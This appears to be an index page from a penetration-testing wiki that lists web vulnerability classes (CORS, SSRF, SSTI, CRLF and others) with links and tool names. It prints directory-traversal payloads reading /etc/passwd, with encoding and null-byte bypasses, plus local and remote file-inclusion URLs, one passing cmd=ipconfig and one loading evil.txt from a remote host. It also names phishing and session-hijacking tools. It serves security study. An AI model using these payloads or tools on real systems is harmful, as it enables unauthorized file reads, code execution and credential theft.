Web App Vulnerabilities

Broken Authentication

pageBroken Authentication

Broken Links

broken-link-checker - Find broken links, missing images, etc within your HTML.
https://ahrefs.com/broken-link-checker
https://brokenlinkcheck.com
https://edoverflow.com/2017/broken-link-hijacking/
https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d
https://kathan19.gitbook.io/howtohunt/broken-link-hijacking/brokenlinkhijacking

Browser Attacks

Beef - BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
- https://www.kali.org/tools/beef-xss/

Metasploit; Browser-AutoPwn
https://systemweakness.com/give-me-a-browser-ill-give-you-a-shell-de19811defa0?gi=a6af0aee993e
Advanced Penetration Testing: Browser Pivoting - pg. 23

Business logic flaws

pageBusiness Logic Flaws

Bypass Methodology

https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md
byp4xx - Pyhhton script for HTTP 40X responses bypassing. Features: Verb tampering, headers, #bugbountytips tricks and 2454 User-Agents.
403bypasser - automates the techniques used to circumvent access control restrictions on target pages.
bypass-403 - A simple script just made for self use for bypassing 403

Clickjacking

pageClickjacking

Command Injection

pageCommand Injection

CORS Attacks

CORS MIsconfig

Corsy - CORS Misconfiguration Scanner
CORScanner - Fast CORS misconfiguration vulnerabilities scanner🍻
CORStest - A simple CORS misconfiguration scanner
CorsMe - Cross Origin Resource Sharing MisConfiguration Scanner
of-CORS - Truffle Security's tool suite for identifying and exploiting CORS misconfigurations on the internal networks of bug bounty targets using typosquatting.
https://owasp.org/www-community/attacks/CORS_RequestPreflightScrutiny
https://owasp.org/www-community/attacks/CORS_OriginHeaderScrutiny
https://pentestbook.six2dez.com/enumeration/web/cors
https://kathan19.gitbook.io/howtohunt/cors/cors

CORS Bypass

https://kathan19.gitbook.io/howtohunt/cors/cors_bypasses

Cross Site Leaks

https://xsleaks.dev/ - Huge resource around cross site leak vulnerabilities

CSRF - Cross Site Request Forgery

pageCSRF

Carriage Return and Line Feed Injection

CRLF Injection

https://owasp.org/www-community/vulnerabilities/CRLF_Injection
CRLF-Injection-Scanner - Command line tool for testing CRLF injection on a list of domains.
crlfuzz A fast tool to scan CRLF vulnerability written in Go
crlfmap - CRLFMap is a tool to find HTTP Splitting vulnerabilities
https://pentestbook.six2dez.com/enumeration/web/crlf

Client Side Template Injection

Client Side Template Injection Scanner - ACSTIS helps you to scan certain web applications for AngularJS Client-Side Template Injection (sometimes referred to as CSTI, sandbox escape or sandbox bypass). It supports scanning a single request but also crawling the entire web application for the AngularJS CSTI vulnerability.

CSV Injection

http://georgemauer.net/2017/10/07/csv-injection.html

Dependancy Confusion

https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610

Deserialization Attacks

pageDeserialization

Directory Transversal

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files.

Basics

Simple attack
- Linux system - ../../../etc/passwd
- Windows system ..\..\..\windows\win.ini
Absolute path from filesystem without traversal sequences
- filename=/etc/passwd
Nested Traversal Sequences
- ....// or ....\/ will revert when stripped
- ....//....//....//etc/passwd
Non standard encoding
- You might be able to use various non-standard encodings, such as ..%c0%af or ..%252f, to bypass the input filter.
- ..%252f..%252f..%252fetc/passwd
Valid start of path/base folder
- filename=/var/www/images/../../../etc/passwd
File extension null byte bypass
- If an application requires that the user-supplied filename must end with an expected file extension, such as .png, then it might be possible to use a null byte to effectively terminate the file path before the required extension.
- filename=../../../etc/passwd%00.png
dotdotpwn - DotDotPwn is a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.

Resources

File Inclusion Vulnerabilities

File inclusion vulnerabilities allow an attacker to include a file into the applications running code. In order to actually exploit a file inclusion vulnerability, we must be able to not only execute code, but also to write our shell payload somewhere.

Discovered the same way as directory transversals
Locate parameters you can manipulate and attempt to use them to load arbitrary files
We take it one step further and attempt to execute the contents of the file within the application
Local file inclusions (LFI) occur when the included file is loaded from the same web server.
- http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
Remote file inclusions (RFI) occur when a file is loaded from an external source.
- Try changing the local path parameter to a URL.
- http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt

File Upload

HTML Injection

Comprehensive Guide on HTML Injection

HTTP Host Header Attacks

pageHTTP Host Header Attacks

HTTP Request Smuggling

pageHTTP Request Smuggling

Input Fuzzing

Wfuzz - Powerful Web application content fuzzer.
FuzzDb - FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing.
ffuf - A super fast web fuzzer written in Go.
- https://www.hackingarticles.in/comprehensive-guide-on-ffuf/
- https://tryhackme.com/room/ffuf
QsFuzz - Qsfuzz (Query String Fuzz) allows you to build your own rules to fuzz query strings and easily identify vulnerabilities.
AFLplusplus - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!

Insecure Direct Object Reference

pageInsecure Direct Object Reference

LDAP Injection

Open Redirect Vulnerabilities

OpenRedireX - A Fuzzer for OpenRedirect issues
Oralyzer - Open Redirection Analyzer
https://pentestbook.six2dez.com/enumeration/web/open-redirects
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md
Comprehensive Guide on Open Redirect
Open Redirect Vulnerabilities - Bug Bounty Hunting Essentials, pg.141

Prototype Pollution

ppfuzz - A fast tool to scan client-side prototype pollution vulnerability written in Rust.

Security Misconfigurations

Security misconfigurations include: • Poorly configured permissions on cloud services, like S3 buckets • Having unnecessary features enabled, like services, pages, accounts or privileges • Default accounts with unchanged passwords • Error messages that are overly detailed and allow an attacker to find out more about the system • Not using HTTP security headers, or revealing too much detail in the Server: HTTP header

Sidejacking

hamster-sidejack - Hamster is tool or “sidejacking”. It acts as a proxy server that replaces your cookies with session cookies stolen from somebody else, allowing you to hijack their sessions.

SQL Injection

pageSQL Injection

SSRF: Server Side Request Forgery

SSRF

SSRF Bible - Ultimate Guide to SSRF vulnerabilities and attacks
SSRF-Testing - SSRF (Server Side Request Forgery) testing resources
Ground Control - This is a collection of scripts used to debug Server Side Request Forgery (SSRF), blind XSS, and insecure XXE processing vulnerabilities.
SSRFire - An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
Gopherus - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
https://tools.intigriti.io/redirector/ - SSRF payload redirect generator
https://pentestbook.six2dez.com/enumeration/web/ssrf
PayloadsAllTheThings/ServerSideRequestForgery
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

SSTI: Server Side Template Injection

SSTI

TPLmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
https://akenofu.gitbook.io/hackallthethings/web-applications/attacks/ssti
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
https://github.com/ambionics/symfony-exploits
https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34
https://tryhackme.com/room/learnssti
Template Injection - Bug Bounty Hunting Essentials, pg.189

X-Path Injection

Web Cache Poisoning

pageWeb Cache Poisoning

Web Man-In-The-Middle

Evilginx2 - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
MITM Proxy - Mitmproxy is your swiss-army knife for debugging, testing, privacy measurements, and penetration testing. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols.

Web Sockets

pageWeb Sockets

XXE - XML External Entity Attacks

pageXXE - XML External Entity Attacks

XSS - Cross Site Scripting

pageXSS Cross-Site Scripting

PreviousExploitation by Port NextBroken Authentication

Last updated 1 year ago